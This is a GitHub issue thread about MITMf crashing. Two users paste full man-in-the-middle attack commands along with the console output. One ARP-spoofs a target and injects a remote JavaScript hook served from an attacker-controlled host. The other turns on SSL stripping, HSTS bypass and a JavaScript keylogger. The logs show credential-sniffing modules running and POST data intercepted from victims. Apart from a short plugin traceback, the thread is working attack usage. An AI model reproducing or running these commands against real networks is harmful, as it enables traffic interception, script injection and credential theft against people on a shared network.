### ISSUE TITLE
frame work not working.....again

### ISSUE THREAD

**Issue by Exotic-Algorithms** [byt3bl33d3r/MITMf#471]
┌─[✗]─[exotic@parrot]─[~]
└──╼ $sudo mitmf --spoof --arp -i wlan0 --gateway 192.168.1.1 --target 192.168.1.3 --inject --js-url http://192.168.1.2:3000/hook.js

 ███▄ ▄███▓ ██▓▄▄▄█████▓ ███▄ ▄███▓  █████▒
▓██▒▀█▀ ██▒▓██▒▓  ██▒ ▓▒▓██▒▀█▀ ██▒▓██   ▒ 
▓██    ▓██░▒██▒▒ ▓██░ ▒░▓██    ▓██░▒████ ░ 
▒██    ▒██ ░██░░ ▓██▓ ░ ▒██    ▒██ ░▓█▒  ░ 
▒██▒   ░██▒░██░  ▒██▒ ░ ▒██▒   ░██▒░▒█░    
░ ▒░   ░  ░░▓    ▒ ░░   ░ ▒░   ░  ░ ▒ ░    
░  ░      ░ ▒ ░    ░    ░  ░      ░ ░      
░      ░    ▒ ░  ░      ░      ░    ░ ░    
       ░    ░                  ░                                                     

[*] MITMf v0.9.8 - 'The Dark Side'
|_ Inject v0.4
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMf-API online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
Error starting SMB server: [Errno 98] Address already in use
|_ SMB server online

2018-05-02 21:19:51 192.168.1.3 [type:Other-Other os:Other] POST Data (192.168.1.1):
{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "uci", "get", { "config": "krouter" } ] }
2018-05-02 21:19:51 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
    a = f(**args)
  File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']
AttributeError: ClientRequest instance has no attribute 'headers'

**Comment by etcshadow1** [comment]
I'm having the a similar issue with certain plug ins.
root@kali:~# mitmf -i eth0 --spoof --arp  --gateway 192.168.0.1  --hsts --jskeylogger

 ███▄ ▄███▓ ██▓▄▄▄█████▓ ███▄ ▄███▓  █████▒
▓██▒▀█▀ ██▒▓██▒▓  ██▒ ▓▒▓██▒▀█▀ ██▒▓██   ▒ 
▓██    ▓██░▒██▒▒ ▓██░ ▒░▓██    ▓██░▒████ ░ 
▒██    ▒██ ░██░░ ▓██▓ ░ ▒██    ▒██ ░▓█▒  ░ 
▒██▒   ░██▒░██░  ▒██▒ ░ ▒██▒   ░██▒░▒█░    
░ ▒░   ░  ░░▓    ▒ ░░   ░ ▒░   ░  ░ ▒ ░    
░  ░      ░ ▒ ░    ░    ░  ░      ░ ░      
░      ░    ▒ ░  ░      ░      ░    ░ ░    
       ░    ░                  ░                                                     

[*] MITMf v0.9.8 - 'The Dark Side'
|_ SSLstrip+ v0.4
|  |_ SSLstrip+ by Leonardo Nve running
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMf-API online
|_ HTTP server online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ DNSChef v0.4 online
|_ SMB server online

2018-06-18 22:00:49 192.168.0.19 [type:Other-Other os:Other] POST Data (192.168.0.1):
{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "uci", "get", { "config": "krouter" } ] }
2018-06-18 22:00:50 192.168.0.19 [type:Other-Other os:Other] POST Data (192.168.0.1):
{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "uci", "get", { "config": "krouter" } ] }
2018-06-18 22:01:19 192.168.0.19 [type:Other-Other os:Other] POST Data (192.168.0.1):
{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "uci", "get", { "config": "krouter" } ] }
2018-06-18 22:01:19 192.168.0.19 [type:Other-Other os:Other] POST Data (192.168.0.1):
{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "uci", "get", { "config": "krouter" } ] }
